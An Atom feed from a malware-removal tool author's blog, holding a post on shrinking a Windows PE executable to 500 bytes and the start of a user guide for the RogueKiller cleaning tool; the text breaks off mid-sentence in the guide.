<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/atom10full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" gd:etag="W/&quot;CEMFRnkzeip7ImA9WhBSE0g.&quot;"><id>tag:blogger.com,1999:blog-8972660870357177426</id><updated>2013-02-20T01:26:57.782-08:00</updated><title>tigzy-RK</title><subtitle type="html">Présentation et tests de malwares avec RogueKiller -- Tests on malwares with RogueKiller</subtitle><link rel="http://schemas.google.com/g/2005#feed" type="application/atom+xml" href="http://tigzyrk.blogspot.com/feeds/posts/default" /><link rel="alternate" type="text/html" href="http://tigzyrk.blogspot.com/" /><link rel="next" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default?start-index=26&amp;max-results=25&amp;redirect=false&amp;v=2" /><author><name>tigzy-RK</name><uri>http://www.blogger.com/profile/09732073712132941191</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://2.bp.blogspot.com/-ZTcduhIm5tM/TamcgoAE1dI/AAAAAAAAABg/Gqy2hRs5Vy0/s220/tigzy1295109643.gif" /></author><generator version="7.00" uri="http://www.blogger.com">Blogger</generator><openSearch:totalResults>31</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/atom+xml" href="http://feeds.feedburner.com/Tigzy-rk" /><feedburner:info uri="tigzy-rk" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><entry gd:etag="W/&quot;AkYMRH8-cSp7ImA9WhNXEUQ.&quot;"><id>tag:blogger.com,1999:blog-8972660870357177426.post-7589687923376967980</id><published>2012-11-29T02:36:00.000-08:00</published><updated>2012-11-29T06:09:45.159-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-11-29T06:09:45.159-08:00</app:edited><title>[Analysis] PE Structure - Make the smallest executable</title><content type="html">&lt;h2 style="text-align: center;"&gt;
&lt;span style="color: #3d85c6;"&gt;&lt;span style="font-size: x-large;"&gt;PE Structure&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;h2 style="text-align: center;"&gt;
&lt;span style="color: #3d85c6;"&gt;&lt;span style="font-size: x-large;"&gt;&lt;span style="font-size: x-large;"&gt;Make the smallest executable&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: small;"&gt;Recently I &lt;span style="font-size: small;"&gt;face&lt;span style="font-size: small;"&gt;d&lt;/span&gt; a prob&lt;span style="font-size: small;"&gt;lem &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;in my devs. I needed an executable that does nothing, but the smallest possible (to include it in a shellcode).&lt;br /&gt;
&lt;br /&gt;
Here's the C++ code:&lt;br /&gt;
&lt;br /&gt;
&lt;pre class="brush: csharp"&gt;#include windows.h
int WINAPI WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
 return 0;
}
&lt;/pre&gt;
&lt;br /&gt;
Nothing complicated.&lt;br /&gt;
I followed this tutorial to reduce the size of the PE : &lt;span style="color: #0c343d;"&gt;&lt;a href="http://thelegendofrandom.com/blog/archives/2231"&gt;&lt;span style="font-size: small;"&gt;http://thelegendofrandom.com/blog/archives/2231&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #0c343d;"&gt;&lt;span style="font-size: small;"&gt;And it le&lt;span style="font-size: small;"&gt;d to a tiny PE (&lt;span style="font-size: small;"&gt;1&lt;/span&gt; ko). But not enough for me.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #0c343d;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Then I followed this tutorial :&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color: #0c343d;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="color: #0c343d;"&gt;&lt;a href="http://win32assembly.programminghorizon.com/pe-tut1.html"&gt;&lt;span style="font-size: small;"&gt;http://win32assembly.programminghorizon.com/pe-tut1.html&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #0c343d;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="color: #0c343d;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;and t&lt;span style="font-size: small;"&gt;o&lt;span style="font-size: small;"&gt;ok this reference &lt;span style="font-size: small;"&gt;poster :&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color: #0c343d;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;a href="http://www.openrce.org/reference_library/files/reference/PE%20Format.pdf"&gt;http://www.openrce.org/reference_library/files/reference/PE%20Format.pdf&amp;nbsp;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #0c343d;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Updated her&lt;span style="font-size: small;"&gt;e: &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color: #0c343d;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="color: #0c343d;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;a href="http://blog.dkbza.org/2012/08/pe-file-format-graphs.html"&gt;http://blog.dkbza.org/2012/08/pe-file-format-graphs.html &lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
I removed lots of null bytes, and modified the parameters to adjust both size and section offset. To finish, I loaded the PE into OllyDbg and modified the Entry point (which was not at the good place). &lt;br /&gt;
&lt;br /&gt;
My PE is now &lt;b&gt;500 bytes&lt;/b&gt;, and fully functional.&lt;br /&gt;
Here's a schematic of the final PE structure. It can help to understand how a PE is structured.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-yLxboghk754/ULc9jF9GxkI/AAAAAAAAATY/Otkvtma1GfI/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="558" src="http://4.bp.blogspot.com/-yLxboghk754/ULc9jF9GxkI/AAAAAAAAATY/Otkvtma1GfI/s640/Capture.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-I4finWcp5Z8/ULc6C_MHxgI/AAAAAAAAATA/04UX4KGFlWA/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h2 style="text-align: left;"&gt;
&lt;span style="font-size: large;"&gt;&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&lt;span style="color: #073763;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: large;"&gt;REFERENCES &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;span style="color: #0c343d;"&gt;&lt;a href="http://win32assembly.programminghorizon.com/pe-tut1.html"&gt;&lt;span style="font-size: small;"&gt;http://win32assembly.programminghorizon.com/pe-tut1.html&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #0c343d;"&gt;&lt;a href="http://thelegendofrandom.com/blog/archives/2231"&gt;&lt;span style="font-size: small;"&gt;http://thelegendofrandom.com/blog/archives/2231&amp;nbsp;&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #0c343d;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;a href="http://www.openrce.org/reference_library/files/reference/PE%20Format.pdf"&gt;http://www.openrce.org/reference_library/files/reference/PE%20Format.pdf&amp;nbsp;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #0c343d;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;a href="http://blog.dkbza.org/2012/08/pe-file-format-graphs.html"&gt;http://blog.dkbza.org/2012/08/pe-file-format-graphs.html &lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #073763; font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="color: #073763;"&gt;&amp;nbsp;&lt;/span&gt;&lt;i&gt; &lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;h2 style="text-align: left;"&gt;
&lt;span style="font-size: large;"&gt;&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&lt;span style="color: #073763;"&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;img src="http://feeds.feedburner.com/~r/Tigzy-rk/~4/G4h5wXfl4QQ" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://tigzyrk.blogspot.com/feeds/7589687923376967980/comments/default" title="Publier les commentaires" /><link rel="replies" type="text/html" href="http://tigzyrk.blogspot.com/2012/11/analysis-pe-structure-make-smallest.html#comment-form" title="7 commentaires" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/7589687923376967980?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/7589687923376967980?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Tigzy-rk/~3/G4h5wXfl4QQ/analysis-pe-structure-make-smallest.html" title="[Analysis] PE Structure - Make the smallest executable" /><author><name>tigzy-RK</name><uri>http://www.blogger.com/profile/09732073712132941191</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://2.bp.blogspot.com/-ZTcduhIm5tM/TamcgoAE1dI/AAAAAAAAABg/Gqy2hRs5Vy0/s220/tigzy1295109643.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-yLxboghk754/ULc9jF9GxkI/AAAAAAAAATY/Otkvtma1GfI/s72-c/Capture.PNG" height="72" width="72" /><thr:total>7</thr:total><feedburner:origLink>http://tigzyrk.blogspot.com/2012/11/analysis-pe-structure-make-smallest.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DUMNQ3gyeCp7ImA9WhNWFEo.&quot;"><id>tag:blogger.com,1999:blog-8972660870357177426.post-5052223659020285952</id><published>2012-11-26T07:57:00.001-08:00</published><updated>2012-12-14T01:31:32.690-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-12-14T01:31:32.690-08:00</app:edited><title>[EN] RogueKiller official tutorial</title><content type="html">&lt;h2 style="text-align: center;"&gt;
&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt;RogueKiller : Official tutorial &lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-2lstW-aOdOg/UE2ejGECGXI/AAAAAAAAAH4/iLdvoDx2vQE/s1600/Pr%C3%A9sentation1.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;h3&gt;
&lt;span style="color: #073763; font-size: large;"&gt;&lt;i&gt;&lt;b&gt;This is a &lt;span style="font-size: large;"&gt;user guide for RogueKille&lt;span style="font-size: large;"&gt;r&lt;/span&gt;, &lt;span style="font-size: large;"&gt;a malware removal tool which can be downlo&lt;span style="font-size: large;"&gt;aded here:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp; &lt;span style="color: #351c75;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;h3&gt;
&lt;span style="color: #073763;"&gt;&lt;i&gt;&lt;b&gt;&lt;span style="color: #351c75;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;h3 style="text-align: center;"&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="color: #073763;"&gt;&lt;b&gt;&lt;span style="color: #351c75;"&gt;&lt;a href="http://tigzy.geekstogo.com/roguekiller.php" target="_blank"&gt;_ RogueKiller _&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;RogueKiller &lt;/b&gt;&lt;span style="color: #073763;"&gt;&lt;span style="font-size: small;"&gt;can be used on&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="color: #741b47;"&gt;&lt;b&gt;Windows XP, Server 2003, Vista, Server 2008, Win7, Win8&lt;/b&gt;&lt;/span&gt;.&lt;br /&gt;
&lt;b&gt;RogueKiller &lt;/b&gt;&lt;span style="color: #073763;"&gt;&lt;span style="font-size: small;"&gt;can be used on &lt;/span&gt;&lt;/span&gt;both &lt;b&gt;&lt;span style="color: #741b47;"&gt;32 bits and 64 bits operating systems&lt;/span&gt;.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;ol&gt;
&lt;li&gt;&lt;span style="background-color: white;"&gt;Begin to download the tool on the desktop, and then &lt;u&gt;&lt;i&gt;quit all running programs&lt;/i&gt;&lt;/u&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="color: #0b5394;"&gt;&lt;span style="background-color: white;"&gt;&lt;span style="color: black;"&gt;Start &lt;b&gt;RogueKiller.exe. &lt;/b&gt;If the program has been blocked, try to rename it by&amp;nbsp;&lt;b&gt;winlogon.exe&lt;/b&gt;, or &lt;b&gt;change its file extension by .com &lt;/b&gt;(ex: Roguekiller.com)&lt;/span&gt;&lt;b&gt; &lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h2 style="text-align: left;"&gt;
&lt;span style="font-size: large;"&gt;&lt;i&gt;&lt;span style="color: #0b5394;"&gt;VIDEO&lt;span style="font-size: large;"&gt; PRESENTATION (French)&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://i.ytimg.com/vi/kkd30mefyrU/0.jpg" height="375" width="600"&gt;&lt;param name="movie" value="http://www.youtube.com/v/kkd30mefyrU?version=3&amp;f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" /&gt;&lt;param name="bgcolor" value="#FFFFFF" /&gt;&lt;param name="allowFullScreen" value="true" /&gt;&lt;embed width="600" height="375"  src="http://www.youtube.com/v/kkd30mefyrU?version=3&amp;f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" type="application/x-shockwave-flash" allowfullscreen="true"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;h2 style="text-align: left;"&gt;
&lt;span style="color: #741b47;"&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;SMARTSCREEN&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;&amp;nbsp;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;On recent OS&lt;span style="font-size: small;"&gt; (Windows 7 &lt;span style="font-size: small;"&gt;/ Windows 8), &lt;b&gt;the SmartScreen &lt;span style="font-size: small;"&gt;filter disallow the &lt;span style="font-size: small;"&gt;start of unknown programs&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;/b&gt; (&lt;span style="font-size: small;"&gt;from Microsoft). &lt;b&gt;&lt;span style="font-size: small;"&gt;To pass through&lt;span style="font-size: small;"&gt; this protection&lt;span style="font-size: small;"&gt; and be able to start RogueKiller,&lt;span style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;do the following:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;ol&gt;
&lt;li&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Cli&lt;span style="font-size: small;"&gt;ck on&lt;/span&gt; &lt;span style="font-size: small;"&gt;&lt;i&gt;&lt;b&gt;More &lt;span style="font-size: small;"&gt;infos&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;i&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Next click on &lt;i&gt;&lt;b&gt;Run anyway&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;i&gt;&lt;b&gt;.&amp;nbsp;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-PMhXgThN7mw/UJU02mU6MkI/AAAAAAAAASg/KCwqy6FsFEM/s1600/Capture.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://3.bp.blogspot.com/-PMhXgThN7mw/UJU02mU6MkI/AAAAAAAAASg/KCwqy6FsFEM/s640/Capture.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-748Zcm_dEvc/UJU03rUuW0I/AAAAAAAAASk/hSh_4fk2RJs/s1600/Capture2.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="238" src="http://4.bp.blogspot.com/-748Zcm_dEvc/UJU03rUuW0I/AAAAAAAAASk/hSh_4fk2RJs/s640/Capture2.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;h2 style="text-align: left;"&gt;
&lt;span style="font-size: large;"&gt;&lt;i&gt;&lt;span style="color: #0b5394;"&gt;PRESCAN&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;h3 style="text-align: left;"&gt;
&amp;nbsp;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
The &lt;b&gt;Prescan &lt;/b&gt;is started as soon as you start RogueKiller. It scans and &lt;b&gt;stops malicious processes, malicious services&lt;/b&gt;, &lt;i&gt;load its driver and do some version checks&lt;/i&gt;. It does not delete anything on the computer, so at this moment a simple reboot restores everything in the initial state (malwares included). No action of the user is required. &lt;br /&gt;
&lt;br /&gt;
RogueKiller may &lt;b&gt;detect a new version available, and offer to download it&lt;/b&gt;. The user can either accept (and be redirected to the download page) or decline. In this case, one can continue to use the program anyway with the outdated version.&lt;b&gt; It is strongly advised to always run the latest version!&lt;/b&gt;&lt;b&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
The list of stopped processes / services can be found in the &lt;i&gt;&lt;b&gt;Processes &lt;/b&gt;&lt;/i&gt;tab.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Important! The "driver" icon (green/red square) turns to green once the driver is loaded. The driver cannot be loaded on 64 bits operating systems.&lt;/b&gt;&lt;br /&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;h2 style="text-align: left;"&gt;
&lt;span style="color: #0b5394; font-size: large;"&gt;&lt;i&gt;SCAN&lt;/i&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;&amp;nbsp;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;The scan is triggered with the &lt;i&gt;&lt;b&gt;Scan &lt;/b&gt;&lt;/i&gt;button&lt;span style="font-size: small;"&gt;&lt;i&gt;&lt;b&gt;. &lt;/b&gt;&lt;/i&gt;&lt;span style="font-size: small;"&gt;This is the first natural step once the Presc&lt;span style="font-size: small;"&gt;an finished&lt;/span&gt;&lt;span style="font-size: small;"&gt;. &lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;The sca&lt;span style="font-size: small;"&gt;n is a processing th&lt;span style="font-size: small;"&gt;at does not modif&lt;span style="font-size: small;"&gt;i&lt;span style="font-size: small;"&gt;es&lt;/span&gt;&lt;/span&gt; the system&lt;span style="font-size: small;"&gt;, &lt;span style="font-size: small;"&gt;because&lt;/span&gt; it only lists the problems &lt;span style="font-size: small;"&gt;to &lt;span style="font-size: small;"&gt;display them at the user. &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Among th&lt;span style="font-size: small;"&gt;ese operations, a check of the&lt;span style="font-size: small;"&gt;&lt;b&gt; automatic startup&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt; entries&lt;/b&gt;&lt;span style="font-size: small;"&gt; (RUN keys, Services, &lt;span style="font-size: small;"&gt;scheduled tasks, startup folders)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;, &lt;span style="font-size: small;"&gt;and more generally &lt;b&gt;of &lt;span style="font-size: small;"&gt;the system hijack&lt;span style="font-size: small;"&gt;s&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;i&gt;. &lt;/i&gt;&lt;span style="font-size: small;"&gt;The scan &lt;span style="font-size: small;"&gt;do also a search of some known infections, and check the &lt;b&gt;existence of some rootkits in the kernel&lt;/b&gt; (with its driver)&lt;span style="font-size: small;"&gt;. To finish,&lt;span style="font-size: small;"&gt; it &lt;b&gt;verif&lt;span style="font-size: small;"&gt;ies&lt;/span&gt; the integrity of the &lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Master Boot Record&lt;/b&gt; (MBR&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;).&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Once the scan finished, a &lt;b&gt;text report is available&lt;/b&gt; by clicking on the &lt;i&gt;&lt;b&gt;Rep&lt;/b&gt;&lt;/i&gt;&lt;span style="font-size: small;"&gt;&lt;i&gt;&lt;b&gt;ort &lt;/b&gt;&lt;/i&gt;button.&lt;/span&gt; It is also available on the desktop&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt; (RKReport[#]&lt;span style="font-size: 